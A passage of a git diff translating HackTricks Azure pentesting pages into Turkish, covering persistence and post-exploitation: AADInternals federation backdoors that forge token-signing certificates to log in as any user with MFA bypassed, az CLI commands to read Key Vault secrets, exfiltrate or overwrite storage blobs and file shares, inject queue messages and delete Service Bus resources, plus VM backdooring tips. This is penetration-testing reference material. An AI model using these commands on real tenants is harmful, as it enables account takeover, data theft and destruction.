$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
```
- For certificate based authentication
- Sertifika tabanlı kimlik doğrulama için
```powershell
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
```
### Federation - Token Signing Certificate
With **DA privileges** on on-prem AD, it is possible to create and import **new Token signing** and **Token Decrypt certificates** that have a very long validity. This will allow us to **log-in as any user** whose ImuutableID we know.
**Run** the below command as **DA on the ADFS server(s)** to create new certs (default password 'AADInternals'), add them to ADFS, disable auto rollver and restart the service:
On-prem AD üzerinde **DA ayrıcalıkları** ile, çok uzun geçerlilik süresine sahip **yeni Token signing** ve **Token Decrypt sertifikaları** oluşturmak ve içe aktarmak mümkündür. Bu, bildiğimiz herhangi bir kullanıcının ImuutableID'si ile **giriş yapmamıza** olanak tanıyacaktır.
**Yeni sertifikaları oluşturmak için** aşağıdaki komutu **ADFS sunucusunda DA olarak** çalıştırın (varsayılan şifre 'AADInternals'), bunları ADFS'ye ekleyin, otomatik yenilemeyi devre dışı bırakın ve hizmeti yeniden başlatın:
```powershell
New-AADIntADFSSelfSignedCertificates
```
Then, update the certificate information with Azure AD:
Sonra, sertifika bilgilerini Azure AD ile güncelleyin:
```powershell
Update-AADIntADFSFederationSettings -Domain cyberranges.io
```
### Federation - Güvenilir Alan
### Federation - Trusted Domain
With GA privileges on a tenant, it's possible to **add a new domain** (must be verified), configure its authentication type to Federated and configure the domain to **trust a specific certificate** (any.sts in the below command) and issuer:
GA ayrıcalıkları ile bir kiracıda, **yeni bir alan eklemek** mümkündür (doğrulanması gerekir), kimlik doğrulama türünü Federated olarak yapılandırmak ve alanı **belirli bir sertifikaya** (aşağıdaki komutta any.sts) ve vericiye güvenecek şekilde yapılandırmak mümkündür:
```powershell
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
@@ -60,13 +51,8 @@ Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
```
## References
## Referanslar
- [https://aadinternalsbackdoor.azurewebsites.net/](https://aadinternalsbackdoor.azurewebsites.net/)
{{#include ../../../banners/hacktricks-training.md}}

12
src/pentesting-cloud/azure-security/az-persistence/az-queue-persistance.md
View File

@@ -4,7 +4,7 @@
## Queue
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-queue-enum.md
@@ -12,8 +12,7 @@ For more information check:
### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
Bu izin, bir saldırganın depolama hesabı içinde kuyruklar ve bunların özelliklerini oluşturmasına veya değiştirmesine olanak tanır. Yetkisiz kuyruklar oluşturmak, meta verileri değiştirmek veya erişim kontrol listelerini (ACL'ler) değiştirerek erişimi vermek veya kısıtlamak için kullanılabilir. Bu yetenek, iş akışlarını bozabilir, kötü niyetli veriler enjekte edebilir, hassas bilgileri dışarı sızdırabilir veya daha fazla saldırıyı mümkün kılmak için kuyruk ayarlarını manipüle edebilir.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
@@ -21,15 +20,10 @@ az storage queue metadata update --name <queue-name> --metadata key1=value1 key2
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md
View File

@@ -4,42 +4,34 @@
## Storage Privesc
For more information about storage check:
Depolama hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-storage.md
{{#endref}}
### Common tricks
### Yaygın hileler
- Keep the access keys
- Generate SAS
- User delegated are 7 days max
- Erişim anahtarlarını saklayın
- SAS oluşturun
- Kullanıcı devredilen en fazla 7 gündür
### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write
These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information.
Bu izinler, kullanıcının silinmiş konteynerler için saklama süresini etkinleştiren veya yapılandıran konteyner silme saklama özelliği için blob hizmeti özelliklerini değiştirmesine olanak tanır. Bu izinler, saldırganın kalıcı olarak silinmesi gereken silinmiş konteynerleri geri kazanması veya manipüle etmesi için bir fırsat penceresi sağlamak amacıyla kalıcılığı sürdürmek için kullanılabilir ve hassas bilgilere erişim sağlar.
```bash
az storage account blob-service-properties update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable-container-delete-retention true \
--container-delete-retention-days 100
```
### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action
These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information.
Bu izinler, saldırganın saklama politikalarını değiştirmesine, silinmiş verileri geri yüklemesine ve hassas bilgilere erişmesine yol açabilir.
```bash
az storage blob service-properties delete-policy update \
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
--account-name <STORAGE_ACCOUNT_NAME> \
--enable true \
--days-retained 100
```
{{#include ../../../banners/hacktricks-training.md}}

22
src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md
View File

@@ -2,28 +2,24 @@
{{#include ../../../banners/hacktricks-training.md}}
## VMs persistence
## VMs kalıcılığı
For more information about VMs check:
VM'ler hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/vms/
{{#endref}}
### Backdoor VM applications, VM Extensions & Images <a href="#backdoor-instances" id="backdoor-instances"></a>
### Arka kapı VM uygulamaları, VM Uzantıları ve Görüntüler <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed.
Bir saldırgan, Azure hesabında sıkça kullanılan uygulamaları, uzantıları veya görüntüleri belirlerse, arka kapısını her kurulduğunda çalıştırmak için VM uygulamalarına ve uzantılarına kodunu ekleyebilir.
### Backdoor Instances <a href="#backdoor-instances" id="backdoor-instances"></a>
### Arka Kapı Örnekleri <a href="#backdoor-instances" id="backdoor-instances"></a>
An attacker could get access to the instances and backdoor them:
Bir saldırgan, örneklere erişim sağlayabilir ve bunları arka kapılayabilir:
- Using a traditional **rootkit** for example
- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- Backdooring the **User Data**
- Örneğin, geleneksel bir **rootkit** kullanarak
- Yeni bir **genel SSH anahtarı** ekleyerek (kontrol et [EC2 privesc seçenekleri](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc))
- **Kullanıcı Verilerini** arka kapılayarak
{{#include ../../../banners/hacktricks-training.md}}

5
src/pentesting-cloud/azure-security/az-post-exploitation/README.md
View File

@@ -1,6 +1 @@
# Az - Post Exploitation

32
src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Storage Privesc
For more information about storage check:
Storage hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-storage.md
@@ -12,38 +12,30 @@ For more information about storage check:
### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**.
Bu izne sahip bir yetkili, bir konteyner içindeki **blob'ları** (dosyaları) **listeleyebilir** ve **hassas bilgileri** içerebilecek dosyaları **indirebilir**.
```bash
# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read
az storage blob list \
--account-name <acc-name> \
--container-name <container-name> --auth-mode login
--account-name <acc-name> \
--container-name <container-name> --auth-mode login
az storage blob download \
--account-name <acc-name> \
--container-name <container-name> \
-n file.txt --auth-mode login
--account-name <acc-name> \
--container-name <container-name> \
-n file.txt --auth-mode login
```
### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob):
Bu izne sahip bir yetkili, **konteynerlerde dosyaları yazma ve üzerine yazma** yeteneğine sahip olacak, bu da ona bazı zararlar verme veya hatta yetkileri artırma imkanı tanıyabilir (örneğin, bir blob'da saklanan bazı kodları üzerine yazmak):
```bash
# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
```
### \*/delete
This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**.
Bu, depolama hesabı içindeki nesneleri silmeye izin verecektir ki bu da bazı hizmetleri **kesintiye uğratabilir** veya müşterinin **değerli bilgileri kaybetmesine** neden olabilir.
{{#include ../../../banners/hacktricks-training.md}}

42
src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
View File

@@ -1,10 +1,10 @@
# Az - File Share Post Exploitation
# Az - Dosya Paylaşımı Sonrası Sömürü
{{#include ../../../banners/hacktricks-training.md}}
File Share Post Exploitation
Dosya Paylaşımı Sonrası Sömürü
For more information about file shares check:
Dosya paylaşımları hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-file-shares.md
@@ -12,41 +12,33 @@ For more information about file shares check:
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read
A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**.
Bu izne sahip bir yetkili, bir dosya paylaşımındaki dosyaları **listeleyebilir** ve **duyarlı bilgileri** içerebilecek dosyaları **indirebilir**.
```bash
# List files inside an azure file share
az storage file list \
--account-name <name> \
--share-name <share-name> \
--auth-mode login --enable-file-backup-request-intent
--account-name <name> \
--share-name <share-name> \
--auth-mode login --enable-file-backup-request-intent
# Download an specific file
az storage file download \
--account-name <name> \
--share-name <share-name> \
--path <filename-to-download> \
--dest /path/to/down \
--auth-mode login --enable-file-backup-request-intent
--account-name <name> \
--share-name <share-name> \
--path <filename-to-download> \
--dest /path/to/down \
--auth-mode login --enable-file-backup-request-intent
```
### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action
A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share):
Bu izne sahip bir yetkili, **dosya paylaşımlarında dosyaları yazma ve üzerine yazma** yeteneğine sahip olacak, bu da ona bazı zararlar verme veya hatta yetkileri artırma imkanı verebilir (örneğin, bir dosya paylaşımında saklanan bazı kodları üzerine yazmak):
```bash
az storage blob upload \
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
--account-name <acc-name> \
--container-name <container-name> \
--file /tmp/up.txt --auth-mode login --overwrite
```
### \*/delete
This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**.
Bu, paylaşılan dosya sistemindeki dosyaları silmeye izin verebilir, bu da **bazı hizmetlerin kesilmesine** veya müşterinin **değerli bilgileri kaybetmesine** neden olabilir.
{{#include ../../../banners/hacktricks-training.md}}

8
src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
View File

@@ -4,18 +4,14 @@
## Funciton Apps Post Exploitaiton
For more information about function apps check:
Function uygulamaları hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-function-apps.md
{{#endref}}
> [!CAUTION] > **Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there:
> [!CAUTION] > **Function Apps sonrası istismar ipuçları, ayrıcalık yükseltme ipuçlarıyla çok ilişkilidir** bu yüzden hepsini orada bulabilirsiniz:
{{#ref}}
../az-privilege-escalation/az-functions-app-privesc.md
{{#endref}}

50
src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Azure Key Vault
For more information about this service check:
Bu hizmet hakkında daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/keyvault.md
@@ -12,27 +12,22 @@ For more information about this service check:
### Microsoft.KeyVault/vaults/secrets/getSecret/action
This permission will allow a principal to read the secret value of secrets:
Bu izin, bir yetkilinin gizli değerini okumasına izin verecektir:
```bash
az keyvault secret show --vault-name <vault name> --name <secret name>
# Get old version secret value
az keyvault secret show --id https://<KeyVaultName>.vault.azure.net/secrets/<KeyVaultName>/<idOldVersion>
```
### **Microsoft.KeyVault/vaults/certificates/purge/action**
This permission allows a principal to permanently delete a certificate from the vault.
Bu izin, bir yetkilinin bir sertifikayı kasadan kalıcı olarak silmesine olanak tanır.
```bash
az keyvault certificate purge --vault-name <vault name> --name <certificate name>
```
### **Microsoft.KeyVault/vaults/keys/encrypt/action**
This permission allows a principal to encrypt data using a key stored in the vault.
Bu izin, bir yetkilinin, kasada saklanan bir anahtarı kullanarak verileri şifrelemesine olanak tanır.
```bash
az keyvault key encrypt --vault-name <vault name> --name <key name> --algorithm <algorithm> --value <value>
@@ -40,76 +35,55 @@ az keyvault key encrypt --vault-name <vault name> --name <key name> --algorithm
echo "HackTricks" | base64 # SGFja1RyaWNrcwo=
az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo=
```
### **Microsoft.KeyVault/vaults/keys/decrypt/action**
This permission allows a principal to decrypt data using a key stored in the vault.
Bu izin, bir yetkilinin kasada saklanan bir anahtarı kullanarak verileri şifre çözmesine olanak tanır.
```bash
az keyvault key decrypt --vault-name <vault name> --name <key name> --algorithm <algorithm> --value <value>
# Example
az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption
```
### **Microsoft.KeyVault/vaults/keys/purge/action**
This permission allows a principal to permanently delete a key from the vault.
Bu izin, bir yetkilinin bir anahtarı kasadan kalıcı olarak silmesine olanak tanır.
```bash
az keyvault key purge --vault-name <vault name> --name <key name>
```
### **Microsoft.KeyVault/vaults/secrets/purge/action**
This permission allows a principal to permanently delete a secret from the vault.
Bu izin, bir yetkilinin bir sırrı kasadan kalıcı olarak silmesine olanak tanır.
```bash
az keyvault secret purge --vault-name <vault name> --name <secret name>
```
### **Microsoft.KeyVault/vaults/secrets/setSecret/action**
This permission allows a principal to create or update a secret in the vault.
Bu izin, bir yetkilinin kasada bir gizli anahtar oluşturmasına veya güncellemesine olanak tanır.
```bash
az keyvault secret set --vault-name <vault name> --name <secret name> --value <secret value>
```
### **Microsoft.KeyVault/vaults/certificates/delete**
This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged.
Bu izin, bir yetkilinin bir sertifikayı kasadan silmesine olanak tanır. Sertifika, "yumuşak silme" durumuna taşınır; burada, temizlenmedikçe geri yüklenebilir.
```bash
az keyvault certificate delete --vault-name <vault name> --name <certificate name>
```
### **Microsoft.KeyVault/vaults/keys/delete**
This permission allows a principal to delete a key from the vault. The key is moved to the "soft-delete" state, where it can be recovered unless purged.
Bu izin, bir yetkilinin bir anahtarı kasadan silmesine olanak tanır. Anahtar, temizlenmediği sürece kurtarılabileceği "yumuşak silme" durumuna taşınır.
```bash
az keyvault key delete --vault-name <vault name> --name <key name>
```
### **Microsoft.KeyVault/vaults/secrets/delete**
This permission allows a principal to delete a secret from the vault. The secret is moved to the "soft-delete" state, where it can be recovered unless purged.
Bu izin, bir yetkilinin kasadan bir sırrı silmesine olanak tanır. Sır, "yumuşak silme" durumuna taşınır; burada, temizlenmedikçe geri yüklenebilir.
```bash
az keyvault secret delete --vault-name <vault name> --name <secret name>
```
### Microsoft.KeyVault/vaults/secrets/restore/action
This permission allows a principal to restore a secret from a backup.
Bu izin, bir yetkilinin bir yedekten bir sırrı geri yüklemesine olanak tanır.
```bash
az keyvault secret restore --vault-name <vault-name> --file <backup-file-path>
```
{{#include ../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Queue
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-queue-enum.md
@@ -12,66 +12,53 @@ For more information check:
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read`
An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks.
Bu izne sahip bir saldırgan, bir Azure Storage Queue'dan mesajları görebilir. Bu, saldırgana mesajların içeriğini işlenmiş olarak işaretlemeden veya durumlarını değiştirmeden görüntüleme imkanı tanır. Bu, hassas bilgilere yetkisiz erişime yol açabilir ve veri sızdırma veya daha fazla saldırı için istihbarat toplama olanağı sağlayabilir.
```bash
az storage message peek --queue-name <queue_name> --account-name <storage_account>
```
**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services.
**Potansiyel Etki**: Kuyruğa yetkisiz erişim, mesajların ifşası veya yetkisiz kullanıcılar veya hizmetler tarafından kuyruk manipülasyonu.
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action`
With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users.
Bu izinle, bir saldırgan Azure Storage Kuyruğundan mesajları alabilir ve işleyebilir. Bu, mesaj içeriğini okuyabilecekleri ve işlenmiş olarak işaretleyebilecekleri anlamına gelir, bu da mesajı meşru sistemlerden gizler. Bu, hassas verilerin ifşa edilmesine, mesajların nasıl işlendiğinde kesintilere veya mesajları hedef kullanıcılarına ulaştırmamayı sağlayarak önemli iş akışlarının durmasına yol açabilir.
```bash
az storage message get --queue-name <queue_name> --account-name <storage_account>
```
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action`
With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages.
Bu izinle, bir saldırgan Azure Storage Queue'ya yeni mesajlar ekleyebilir. Bu, kötü niyetli veya yetkisiz verilerin kuyruğa enjekte edilmesine olanak tanır ve bu da istenmeyen eylemleri tetikleyebilir veya mesajları işleyen aşağı akış hizmetlerini kesintiye uğratabilir.
```bash
az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
```
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write`
This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue.
Bu izin, bir saldırganın Azure Storage Queue'da yeni mesajlar eklemesine veya mevcut olanları güncellemesine olanak tanır. Bunu kullanarak, zararlı içerik ekleyebilir veya mevcut mesajları değiştirebilir, bu da uygulamaları yanıltabilir veya kuyruğa bağımlı sistemlerde istenmeyen davranışlara neden olabilir.
```bash
az storage message put --queue-name <queue-name> --content "Injected malicious message" --account-name <storage-account>
#Update the message
az storage message update --queue-name <queue-name> \
--id <message-id> \
--pop-receipt <pop-receipt> \
--content "Updated message content" \
--visibility-timeout <timeout-in-seconds> \
--account-name <storage-account>
--id <message-id> \
--pop-receipt <pop-receipt> \
--content "Updated message content" \
--visibility-timeout <timeout-in-seconds> \
--account-name <storage-account>
```
### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete`
This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system.
Bu izin, bir saldırganın depolama hesabındaki kuyrukları silmesine olanak tanır. Bu yetenekten yararlanarak, bir saldırgan kuyrukları ve bunlarla ilişkili tüm mesajları kalıcı olarak kaldırabilir, bu da iş akışlarında önemli kesintilere neden olur ve etkilenen kuyruklara bağımlı uygulamalar için kritik veri kaybına yol açar. Bu eylem ayrıca sistemin temel bileşenlerini kaldırarak hizmetleri sabote etmek için de kullanılabilir.
```bash
az storage queue delete --name <queue-name> --account-name <storage-account>
```
### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete`
With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue.
Bu izinle, bir saldırgan bir Azure Storage Queue'dan tüm mesajları temizleyebilir. Bu eylem, tüm mesajları kaldırarak iş akışlarını kesintiye uğratır ve kuyruğa bağımlı sistemler için veri kaybına neden olur.
```bash
az storage message clear --queue-name <queue-name> --account-name <storage-account>
```
### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write`
This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks.
Bu izin, bir saldırganın depolama hesabı içinde kuyruklar ve bunların özelliklerini oluşturmasına veya değiştirmesine olanak tanır. Yetkisiz kuyruklar oluşturmak, meta verileri değiştirmek veya erişim kontrol listelerini (ACL'ler) değiştirerek erişimi vermek veya kısıtlamak için kullanılabilir. Bu yetenek, iş akışlarını kesintiye uğratabilir, kötü niyetli veriler enjekte edebilir, hassas bilgileri dışarı sızdırabilir veya daha fazla saldırıyı mümkün kılmak için kuyruk ayarlarını manipüle edebilir.
```bash
az storage queue create --name <new-queue-name> --account-name <storage-account>
@@ -79,15 +66,10 @@ az storage queue metadata update --name <queue-name> --metadata key1=value1 key2
az storage queue policy set --name <queue-name> --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name <storage-account>
```
## References
## Referanslar
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
{{#include ../../../banners/hacktricks-training.md}}

44
src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md
View File

@@ -4,7 +4,7 @@
## Service Bus
For more information check:
Daha fazla bilgi için kontrol edin:
{{#ref}}
../az-services/az-servicebus-enum.md
@@ -12,81 +12,65 @@ For more information check:
### Actions: `Microsoft.ServiceBus/namespaces/Delete`
An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows.
Bu izne sahip bir saldırgan, tüm Azure Service Bus ad alanını silebilir. Bu eylem, ad alanını ve ona bağlı tüm kaynakları, kuyruklar, konular, abonelikler ve bunların mesajları dahil olmak üzere, kaldırarak, tüm bağımlı sistemler ve iş akışları üzerinde geniş çaplı kesintilere ve kalıcı veri kaybına neden olur.
```bash
az servicebus namespace delete --resource-group <ResourceGroupName> --name <NamespaceName>
```
### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete`
An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic.
Bu izne sahip bir saldırgan, bir Azure Service Bus konusunu silebilir. Bu eylem, konuyu ve ona bağlı tüm abonelikleri ve mesajları kaldırır, bu da kritik verilerin kaybına ve konudan bağımlı sistemlerin ve iş akışlarının kesintiye uğramasına neden olabilir.
```bash
az servicebus topic delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <TopicName>
```
### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete`
An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue.
Bu izne sahip bir saldırgan, bir Azure Service Bus kuyruğunu silebilir. Bu eylem, kuyruğu ve içindeki tüm mesajları kaldırır, bu da kritik verilerin kaybına ve kuyruğa bağımlı sistemlerin ve iş akışlarının kesintiye uğramasına neden olabilir.
```bash
az servicebus queue delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName>
```
### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete`
An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription.
Bu izne sahip bir saldırgan, bir Azure Service Bus aboneliğini silebilir. Bu eylem, aboneliği ve ona bağlı tüm mesajları kaldırır, bu da aboneliğe dayanan iş akışlarını, veri işleme süreçlerini ve sistem operasyonlarını potansiyel olarak kesintiye uğratabilir.
```bash
az servicebus topic subscription delete --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --topic-name <TopicName> --name <SubscriptionName>
```
### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read`
An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk.
Azure Service Bus ad alanları oluşturma veya değiştirme izinlerine sahip bir saldırgan, bunu operasyonları kesintiye uğratmak, yetkisiz kaynaklar dağıtmak veya hassas verileri açığa çıkarmak için kullanabilir. Kamu ağı erişimini etkinleştirmek, şifreleme ayarlarını düşürmek veya performansı düşürmek veya maliyetleri artırmak için SKU'ları değiştirmek gibi kritik yapılandırmaları değiştirebilirler. Ayrıca, yerel kimlik doğrulamayı devre dışı bırakabilir, kopya konumlarını manipüle edebilir veya güvenlik kontrollerini zayıflatmak için TLS sürümlerini ayarlayabilirler; bu da ad alanı yanlış yapılandırmasını önemli bir post-exploitation riski haline getirir.
```bash
az servicebus namespace create --resource-group <ResourceGroupName> --name <NamespaceName> --location <Location>
az servicebus namespace update --resource-group <ResourceGroupName> --name <NamespaceName> --tags <Key=Value>
```
### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`)
An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk.
Azure Service Bus kuyruklarını oluşturma veya değiştirme izinlerine sahip bir saldırgan (kuyrukları değiştirmek için ayrıca Action:`Microsoft.ServiceBus/namespaces/queues/read` iznine de ihtiyacınız olacak) bunu verileri yakalamak, iş akışlarını kesintiye uğratmak veya yetkisiz erişimi sağlamak için kullanabilir. Kötü niyetli uç noktalara mesaj iletimi gibi kritik yapılandırmaları değiştirebilir, verileri uygunsuz bir şekilde saklamak veya silmek için mesaj TTL'sini ayarlayabilir veya hata yönetimini etkilemek için ölü mektup işlemlerini etkinleştirebilir. Ayrıca, hizmet işlevselliğini kesintiye uğratmak veya tespiti atlatmak için kuyruk boyutlarını, kilit sürelerini veya durumları manipüle edebilir, bu da bunu önemli bir post-exploitation riski haline getirir.
```bash
az servicebus queue create --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName>
az servicebus queue update --resource-group <ResourceGroupName> --namespace-name <NamespaceName> --name <QueueName>
```
### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`)
